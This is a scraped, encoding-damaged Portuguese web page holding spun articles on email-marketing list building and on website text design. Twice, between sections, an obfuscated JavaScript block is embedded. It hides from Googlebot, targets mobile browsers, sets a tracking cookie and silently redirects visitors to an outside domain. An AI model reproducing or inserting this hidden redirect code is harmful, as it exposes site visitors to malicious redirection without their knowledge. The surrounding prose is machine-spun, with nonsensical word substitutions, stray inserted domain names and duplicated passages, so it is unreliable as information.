autoresponders (incluindo AWeber e GetResponse) oferecem modelos para mensagens genA�ricas (como a lista acima), tornando seu trabalho muito mais chocho. Tudo este que vocA? realmente precisa A� personalizar esses modelos, se preciso, e apA?s carregar suas prA?prias mensagens.

Landing Page

Muitas pessoas simplesmente usam uma inscriA�A?o para este nosso boletim informativo? gA�nero de caixa em suas pA?ginas fundamentais e esperamos que os indA�viduos entrem na loja. NA?o A� mal funciona. Para as pessoas se inscreverem na sua lista, elas devem estar interessadas no que vocA? tem a dizer. Isso significa que primeiro vocA? tem que educar seus assinantes em potencial para o que eles tA?m a ganhar entregando seus endereA�os de e-mail para o visitante. Configure uma pA?gina separada em seu website como uma pA?gina por destino. Nesta pA?gina, o visitante incluiria uma descriA�A?o do seu boletim informativo, bem como os principais pontos fortes para seus assinantes se inscreverem no boletim informativo (um relatA?rio gratuito a respeito de atualizaA�A�es semanais, ou dicas de namoro regulares, ou qualquer de que seja o seu nicho). A chave aqui foi convencer este leitor de que, se eles estiverem interessados em seu campo, A� uma vantagem para eles assinarem o boletim informativo, como A� o lugar fantA?stico para adquirir as melhores informaA�A�es a cerca de esse campo. E, significativo, fornecer 1 formulA?rio bronco para estes visitantes preencherem e se inscreverem em seu boletim informativo.

Direcionar trA?fego

AtA� agora, vocA? permanecequeda pronto para construir sua prA?pria lista e aumentar as vendas atravA�s de seu autoresponder. PorA�m primeiro, vocA? precisa direcionar o trA?fego (leia vizinhos reais) para sua pA?gina de destino para que eles permitam se inscrever em sua lista. Aprecie uma breve discussA?o de algumas tA?ticas que o visitante pode utilizar:

* Escrever e enviar artigos em um diretA?rio do post de nicho.

Certifique-se de incorporar sua caixa do recurso no final do post, com 1 texto descrevendo seu curso por e-mail e um link voltando para sua prA?pria pA?gina de destino. Isso A� em muito elementar, mas ainda A� surpreendente como poucas pessoas acabam aproveitando-se disso, usando a certeza de que o visitante se concentra nos importantes sites abastados em conteA?do do seu nicho ao enviar esses artigos.

* Se vocA? espera lucrar significativamente usando seus assinantes (na prA?xima liA�A?o, saiba como vocA? tA?m a possibilidade de calcular este valor da vida A?til do seu assinante), vocA? pode gastar algum numerA?rio na criaA�A?o de sua prA?pria lista.

Use o Google AdWords ou o Yahoo Search Marketing para direcionar o trA?fego segmentado para sua pA?gina de fatalidade. A chave aqui A� especialmente fazer lances em frases muito especA�ficas de duas e 3 palavras, para que nA?o apenas seu trA?fego seja segmentado, contudo tambA�m que vocA? possa obter esses cliques com a certeza de nA?o pagar 1 preA�o cafifa por clique ( 1 visitante), caso contrA?rio, este processo pode sair atravA�s culatra em vocA?.

* Simples saiba como parece, certifique-se de estimular o seu boletim informativo em seu sitio. NA?o se limite a escolher um link em todas as pA?ginas – inclua algum texto e realmente explique em poucas palavras o que este boletim informativo oferece (como um anA?ncio de PPC).

* Propor um brinde – isso pode ser uma ferramenta gratuita ou acesso a uma divisA?o do seu site (onde vocA? guarda o bom conteA?do) ou atA� precisamente um relatA?rio para download. Este foi de longe o ainda mais comum de que os funcionA?rios de marketing usam para construir sua lista.

* Se vocA? tiver 1 discurso por vendas em seu site, certifique-se de que seu boletim informativo gratuito esteja em destaque nele. Ele fornecerA? aos leitores uma alternativa isenta de riscos para testA?-lo e descobrir se o visitante realmente pode cumprir qualquer reivindicaA�A?o produzida no discurso de vendas. AlA�m disso, muitas pessoas nA?o compram imediatamente – elas tendem a avaliar os prA?s e contras e deliberar deveras sobre as decisA�es do compra (especialmente decisA�es do compra caras). Ao oferecer a eles a opA�A?o de se inscrever no seu boletim informativo, vocA? garante uma trilha interna para a compra ou nA?o de debate em suas mentes e estA? em posiA�A?o do ganhar sua prA?pria confianA�a e ganhar seu dinheiro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

l tais como projetar 1 site funcional – parcela 2 Texto: formato, espaA�os e cores

Qual A� mtaprofessionalcircle.com.au o maior engano que as pessoas cometem em suas campanhas de email marketing? NA?o A� uma estratA�gia ruim – embora a mA? estratA�gia mesmo que um fator importante para arruinar qualquer potencial de lucro de que um sitio, produto ou ideia possa ter. E nA?o, nA?o A� carA?ncia de leads – obter sua lista A� surpreendentemente fA?cil, uma vez que vocA? sabe o caminho certo para fazA?-lo. Este maior engano que os indA�viduos cometem foi o seguinte: elas assumem que o e-mail marketing deve ser deixado a cargo dos entendidos na matA�ria e nA?o se preocupe em saber nada sobre isso!

Gente, eu nA?o estou brincando sobre isso. HA? toneladas e toneladas de sites por aA� com planos de negA?cios perfeitamente rentA?veis que estA?o perdendo ouro puro, ignorando suas anuncios de marketing por e-mail. E nA?o, o envio de boletins informativos mensais sobre atualizaA�A�es no sitio nA?o constitui um e-mail marketing. E-mail marketing A� um desenvolvimento de geraA�A?o de negA?cios atravA�s da manutenA�A?o do uma lista de contatos de e-mail – pessoas que se inscrevem na sua lista por um motivo ou outro (geralmente para conseguir acesso a informaA�A�es ou a destemido outro recurso). Uma campanha executada corretamente envolve pelo menos este seguinte: * CriaA�A?o do um relacionamento positivo e responsivo com sua lista. * Fornecer sua lista com uma razA?o para confiar em vocA? e em seu conselho (dA? informaA�A�es de qualidade primeiro, peA�a o numerA?rio deles ainda mais tarde). * Promover produtos direcionados e A?teis para sua lista (relacionados (direta ou indiretamente) com a razA?o atravA�s qual eles se inscreveram em sua prA?pria lista.

O visitante verA? nessa lista do pontos que o simples envio do ofertas promocionais para vA?rios endereA�os de e-mail nA?o se qualifica como e-mail marketing. NA?o. Isso A� especialmente spam. NA?o seja como a maioria das pessoas na Internet. Se vocA? estacionaestaficafixa jazepararpermanecequeda operando em um nicho on-line, foi quase garantido que vocA? esteja sentado em uma pequena mina de ouro. Tire proveito disso por todos os meios possA�veis e faA�a o esforA�o para criar sua prA?pria campanha de marketing por e-mail.

As ferramentas.

Para configurar sua campanha de marketing por e-mail, vocA? precisa do seguinte:

* Um autoresponder confiA?vel.

* 1 formulA?rio de captura por chumbo / pA?gina do destino.

* Significa trazer trA?fego para essa pA?gina de destino. * 1 conjunto por mensagens prA�-escritas para sua prA?pria lista.

* Um programa de marketing por email.

Se isso parece em demasia, nA?o se preocupe. Todos os cinco pontos sA?o explicados detalhadamente abaixo.

Este autoresponder Um autoresponder foi a ferramenta mais poderosa no seu arsenal de e-mail marketing. Essencialmente, ele nA?o apenas automatiza o gerenciamento de listas (incluindo solicitaA�A�es de assinatura e cancelamento de assinatura), mas igualmente pode automatizar o processo de envio de e-mails para sua prA?pria lista. VocA? pode carregar um conjunto de e-mails / mensagens para sua prA?pria lista no seu autoresponder, e o script enviarA? os e-mails automaticamente nas datas que o visitante especificar. Os dois autoresponders que eu recomendaria sA?o AWeber e GetResponse. Ambos tA?m preA�os razoA?veis e espetaculares caracterA�sticas. Eu pessoalmente uso o Aweber, embora se vocA? quiser testar autoresponders e ver como eles funcionam eu sugiro de que vocA? se inscreva para a variaA�A?o gratuita do GetResponse e experimente lA? primeiro. Configurando um autoresponder A� deveras simples. Tanto o AWeber quanto este GetResponse tA?m um procedimento simples de inscriA�A?o e, quando vocA? entra, eles fornecem tutoriais detalhados para ajudA?-lo a configurar seu processo de gerenciamento de listas.

Mensagens prA�-escritas O gerenciamento de listas A� deveras simples usando autoresponders. VocA? pode prA�-carregar sua conta com respostas de modelo para qualquer uma de seguintes ocasiA�es: * Quando alguA�m se inscrever por meio de um formulA?rio de captura de leads. * Quando alguA�m confirma sua inscriA�A?o na sua lista. * Quando alguA�m cancelar a assinatura da sua lista. * Quando alguA�m envia um email para o seu endereA�o de email do autoresponder (pode configurar esta recado para expressar ao remetente que irA? responder dentro de 1 determinado perA�odo de tempo ou redirecionA?-lo para um endereA�o do email diferente). AlA�m disso, vocA? tA?m a possibilidade de escrever muitos e-mails usando antecedA?ncia (no caso por vocA? querer enviar mensagens para seus assinantes em datas especA�ficas no futuro) e carregA?-los em seu autoresponder. Em seguida, basta especificar as datas nas quais vocA? deseja que cada mensagem seja enviada e seu manejorefregatrA?fego estA? concluA�do. O autoresponder cuida por todo este resto. Este prA�-carregamento do mensagens no seu autoresponder foi uma A?tima maneira por agendar 1 curso de email informativo ou se vocA? quiser enviar vA?rios emails promocionais para este mesmo resultado. A maioria destes autoresponders (incluindo AWeber e GetResponse) oferecem modelos para mensagens genA�ricas (como a lista acima), tornando seu trabalho muito mais bronco. Tudo este que o visitante realmente precisa A� personalizar esses modelos, se preciso, e depois carregar suas prA?prias mensagens.

Landing Page

Muitas pessoas simplesmente usam uma inscriA�A?o para o nosso boletim informativo? espA�cie de caixa em as suas pA?ginas importantes e esperamos que os indA�viduos entrem na loja. NA?o A� assim que funciona. Para as pessoas se inscreverem na sua lista, elas devem estar interessadas no que vocA? tem a expressar. Isso significa que primeiro vocA? tem que educar seus assinantes em potencial para este que eles tA?m a ganhar entregando seus endereA�os de e-mail para o visitante. Configure uma pA?gina separada em seu website como uma pA?gina por destino. Nesta pA?gina, vocA? incluiria uma descriA�A?o do seu boletim informativo, natural como estes principais pontos positivos para seus assinantes se inscreverem no boletim informativo (um relatA?rio gratuito a respeito de atualizaA�A�es semanais, ou dicas de namoro regulares, ou qualquer que seja o seu nicho). A chave aqui A� especialmente convencer o leitor que, se eles estiverem interessados em seu campo, A� uma vantagem para eles assinarem o boletim informativo, como A� este lugar mA?gico para conseguir as melhores informaA�A�es a cerca de esse campo. E, significativo, fornecer 1 formulA?rio chocho para estes visitantes preencherem e se inscreverem em seu boletim informativo.

Direcionar trA?fego

AtA� agora, vocA? permanecequeda pronto para construir sua lista e aumentar as vendas atravA�s de seu autoresponder. Contudo primeiro, o visitante precisa direcionar o trA?fego (leia vizinhos reais) para sua pA?gina de destino para que eles permitam se inscrever em sua lista. Aprecie uma breve discussA?o do algumas tA?ticas que o visitante pode usar:

* Escrever e enviar artigos em um diretA?rio do artigo de nicho.

Certifique-se de incorporar sua caixa do refugio no fim do post, com um texto descrevendo seu curso por e-mail e 1 link voltando para sua pA?gina por destino. Isso A� deveras elementar, porA�m ainda A� surpreendente tais como poucas vizinhos acabam aproveitando-se disso, usando a certeza de que o visitante se concentra nos principais sites abastados em conteA?do do seu nicho ao enviar esses artigos.

* Se vocA? espera lucrar significativamente com seus assinantes (na prA?xima liA�A?o, como vocA? tA?m a possibilidade de calcular o valor da vida A?til do seu assinante), vocA? pode gastar algum numerA?rio na criaA�A?o de sua prA?pria lista.

Use o Google AdWords ou o Yahoo Search Marketing para direcionar o trA?fego segmentado para sua pA?gina de fatalidade. A chave aqui A� fazer lances em frases muito especA�ficas de duas e 3 palavras, para que nA?o apenas seu trA?fego seja segmentado, porA�m tambA�m de que vocA? possa obter esses cliques com a certeza de nA?o pagar 1 preA�o cafifa por clique ( 1 visitante), caso contrA?rio, o processo pode vir a sair pela culatra em vocA?.

* Simples como parece, certifique-se de estimular o seu boletim informativo em seu site. NA?o se limite a escolher 1 link em todas as pA?ginas – inclua destemido texto e realmente explique em poucas palavras este que o boletim informativo oferece (como um anA?ncio de PPC).

* Oferecer um brinde – isso pode ser uma ferramenta gratuita ou acesso a uma seA�A?o do seu site (onde vocA? guarda o porreiro conteA?do) ou atA� exatamente um relatA?rio para download. Este A� especialmente de longe o mais comum de que os funcionA?rios de marketing usam para construir sua lista.

* Se vocA? tiver 1 discurso por vendas em seu site, certifique-se de que seu boletim informativo gratuito esteja em destaque nele. Ele fornecerA? aos leitores uma alternativa isenta de riscos para testA?-lo e testemunhar se o visitante realmente tA?m a possibilidade de cumprir qualquer reivindicaA�A?o feita no discurso de vendas. AlA�m disso, muitas pessoas nA?o compram imediatamente – elas tendem a avaliar os prA?s e contras e deliberar em muito sobre as decisA�es de compra (especialmente decisA�es por compra caras). Ao oferecer a eles a opA�A?o de se inscrever no seu boletim informativo, vocA? garante uma trilha interna para a compra ou nA?o de debate em as suas mentes e estA? em posiA�A?o do ganhar sua prA?pria confianA�a e ganhar seu dinheiro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

l tais como projetar 1 site funcional – parte 2 Artigo: formato, espaA�os e cores

A internet A� claramente adequada art325b.wordpress.com para a apresentaA�A?o de documentos curtos, contendo muitos hyperlinks. No caso de um texto comprido, nA?o substituirA? um livro ou uma revista (pelo menos pelo momento). No entanto, se houver necessidade do fazer upload de material mais comprido, ele deverA? ser dividido em diversas partes e a versA?o para impressA?o ou download deverA? ser disponibilizada na forma de arquivos HTML ou RTF. 1o de tudo, o post deve ser lA?cido. Por meio de parA?grafos curtos, diferentes estilos (nA�veis) de tA�tulos e listas numeradas, podemos melhorar a legibilidade do texto. Palavras importantes devem ser destacadas em negrito ou em itA?lico e, ao mesmo tempo, sublinhado deve ser evitado, pois A� reservado para links. O texto deve ser estA?tico, ainda que possamos encontrar pA?ginas da web usando mensagens curtas na forma por faixa do rolagem. Excepcionalmente, um post em movimento A� lido mais tardiamente. Nesse caso, o retorno A�s informaA�A�es selecionadas tambA�m A� prejudicado. VocA? deve esperar atA� mesmo que as informaA�A�es restantes tenham passado. A forma tais como os parA?grafos sA?o ajustados tambA�m influencia o ritmo da leitura. Sugere-se alinhar A� esquerda ou justificar, porque este texto formatado de tal maneira lA? muito ainda mais facilmente. O texto nA?o deve ser exibido em toda a largura da tela. Muitas vezes, permite o leitor omitir linhas ou descer uma linha abaixo. Linhas contendo no mA?ximo 10 palavras sA?o as ainda mais fA?ceis por ler. A cor do texto deve contrastar com a cor do plano de fundo. Um texto preto inana um fundo branco A� especialmente o ainda mais legA�vel. A combinaA�A?o inversa tambA�m A� boa, no entanto, no caso de textos mais longos, desencoraja o usuA?rio e diminui este ritmo da leitura. O uso de cores brilhantes A� especialmente muito cansativo para os olhos. Do fato, a despeito de de chamarem nossa sentido, desestimulam apA?s um curto perA�odo de tempo. O plano de fundo deve ser simples, visto que os grA?ficos dificultam a distinA�A?o de linhas do caracteres e formas das palavras. Ainda assim, se decidirmos usar 1 padrA?o, ele deve ser demasiado sutil. Pelo caso do tA�tulos de seA�A�es, temos que evitar cores. Este texto colorido A� reservado para referA?ncias. O usuA?rio nA?o lA? um sitio linha por linha, contudo sim passa por ele. Por isso, este conteA?do do site deve ser dividido em vA?rias partes, cada uma das quais deve arrecadar um tA�tulo. Vale a pena fazer alguns espaA�os vazios entre blocos de texto. 1 documento dividido em partes A� lido mais simplesmente do que 1 texto escrito sem espaA�os. As A�mpares desvantagens dessa soluA�A?o sA?o a extensA?o do texto e ter que sua rolagem contA�nua. Nesses casos, recomenda-se colocar uma referA?ncia de que permita voltar a tela.

SeleA�A?o apropriada de fontes

A�s vezes, hA? discussA�es sobre a seleA�A?o de tipos de fonte por conta da divisA?o em fontes isento serifas (por exemplo, Verdana) e serif (por exemplo, Times New Roman). A� comumente entendido que os indA�viduos preferem ler textos escritos por meio de origens serif. Isso resulta do fato que as serifas facilitam a movimentaA�A?o por um personagem para outro, o de que aumenta sua prA?pria legibilidade. O presente princA�pio, no entanto, aplica-se a documentos em papel. A baixa sentido torna as fontes usando serifa dificilmente legA�veis na tela. A� especialmente por grande mais valia no caso de textos escritos por meio por fontes pequenas. Juntamente com o crescente nA?mero do usuA?rios que possuem monitores de alta definiA�A?o, esse princA�pio terA? menos mais valia. No entanto, por enquanto, fontes sans-serif sA?o mais preferA�veis. Certamente, o tamanho da fonte possui um impacto na legibilidade. Fonte tamanho pelo menos 10 pontos deve ser utilizado para o texto bA?sico. A� importante evitar letras maiA?sculas pelo texto. TEXTO ESCRITO NESSE FORMA Foi LIDO EM CERCA DE 10% MAIS TARDIAMENTE. NA?o mais do que dois modelos de fonte (para textos de papeis e tA�tulos) ou 3 no caso de textos especiais, por ex. lei do plano, deve ser usado.

GrA?ficos, ilustraA�A�es e animaA�A�es

Os grA?ficos, assim como estes multimA�dia, devem ser colocados nos sitios quando eles realmente permitem que o usuA?rio entenda melhor as informaA�A�es apresentadas ou melhoram as qualidades estA�ticas da pA?gina da web. Estes objetivos do projeto grA?fico sA?o informar, facilitar a movimentaA�A?o de recursos, mas nA?o modificar-se atenA�A?o. Se nA?s usar grA?ficos, em vez do muitas fotos, podemos utilizar um diversas vezes. NA?o sA? irA? acelerar este carregamento da pA?gina, contudo tambA�m garantirA? a coesA?o visual do site. Para fazer upload de uma imagem, devemos nos lembrar de juntar o atributo ALT, de que permitirA? ao usuA?rio ver o de que uma determinada imagem apresenta antes de ser exibida. Para alA�m disso, navegadores para cegos podem ver arquivos ALT em voz alta. Imagens de produtos desempenham um papel vital no processo de tomada de decisA?o sobre sua prA?pria compra. Estes usuA?rios que visitam lojas on-line estA?o mais dispostos a esperar por muito mais alguns segundos para olhar como A� o resultado em de que estA?o interessados. No entanto, este princA�pio de um nA?mero limitado do imagens e ilustraA�A�es deve ser aplicado em pA?ginas por nA�vel superior. No site que exprime um produto, para alA�m da descriA�A?o do resultado, devemos criar o upload de uma pequena foto (leia-se: “light”) ou uma referA?ncia a uma pA?gina que exprime seu formato maior ou fotografias adicionais na forma por uma galeria. Todos estes tipos de esquemas, diagramas e grA?ficos constituem outros elementos grA?ficos, que facilitam a compreensA?o e assimilaA�A?o do conteA?do da pA?gina, e que sA?o preferidos pelos usuA?rios por causa dessas qualidades. Estes A�cones tambA�m igualmente similarmente identicamente conjuntamente sA?o deveras usados. Ainda assim, devemos lembrar que a aparA?ncia deles nem sempre pode ser interpretada de forma idA?ntica e vale a pena descrevA?-los de modo a nA?o induzir em erro o destinatA?rio. Para mais, nA?o A� especialmente aconselhA?vel usar o menu grA?fico e os botA�es. Prolonga este carregamento da pA?gina e, alA�m disso, causa problemas adicionais, p. quando outra categoria por menu A� adicionada derivado A? reestruturaA�A?o do site. Em seguida, o webmaster deve entrar em contato com o designer grA?fico de que comeA�a a procurar por arquivos de origem. A situaA�A?o pode vir a se tornar mais complicada quando os grA?ficos sA?o projetados por uma pessoa de fora, que nA?o definiu diretrizes para este design do elementos grA?ficos. As animaA�A�es constituem outra forma comumente usada, cujo objetivo A� chamar a atenA�A?o do usuA?rio. No entanto, eles devem ser utilizados raramente, como A� difA�cil se concentrar em 1 texto usando muitos sinais em movimento. Se vocA? puder responder afirmativamente a questA?o do saber se A� possA�vel expressar sua mensagem isento animaA�A?o, entA?o vocA? deve renunciar aos grA?ficos animados. Se tem que estar presente na pA?gina web, nA?o deverA? muito dificil. Ele incomoda o usuA?rio e dificulta o foco na parte principal da pA?gina. A� especialmente por isso que, apA?s vA?rias repetiA�A�es, deve parar.

A pA?gina principal

A� uma vitrine do site, quando um usuA?rio precisa encontrar uma resposta para as seguintes perguntas: “Que espA�cie de informaA�A?o A� apresentada no site? “, “Que conteA?do ela oferece? ” A� portanto que, para alA�m do nome e logotipo de destaque da empresa, deve atalhar o catA?logo de seA�A�es, um breve resumo de principais informaA�A�es, bem do tipo mA?dulo por pesquisa. Igualmente constitui 1 bom lugar para informar sobre promoA�A�es, no entanto, eles nA?o devem ocupar bastante espaA�o. Sua principal funA�A?o deve ser familiarizar o usuA?rio com sua prA?pria A?rea de assunto, incentivA?-lo a entrar em outras pA?ginas da Web, contudo antes de mais nada, para possibilitar uma pesquisa adicional por meio de um sistema de navegaA�A?o simples e intuitivo.

NA?o apenas 1 projeto

Foi impossA�vel discutir todos estes princA�pios de funcionalidade do site em um artigo. A� portanto que vale a pena se familiarizar com outras publicaA�A�es elaborando sobre este assunto. Inumeras vezes, acontece que a aplicaA�A?o de todas as regras ao mesmo tempo nA?o A� viA?vel, especialmente ao projetar sitios muito complicados. Em tais casos, foi necessA?rio renunciar a alguns princA�pios. Elementos nA?o diretamente relacionados usando o design da pA?gina da web, por exemplo sentido de tela, tamanho por fonte delimitado pelo usuA?rio ou um navegador utilizado, tambA�m tA?m um impacto na funcionalidade. O site deve ser testado antes de ser publicado na Internet. A conclusA?o e implementaA�A?o do projeto nA?o significa que podemos ignorar a funcionalidade. Um bom criador deve monitorar as suas pA?ginas da Web a esse respeito o tempo todo.

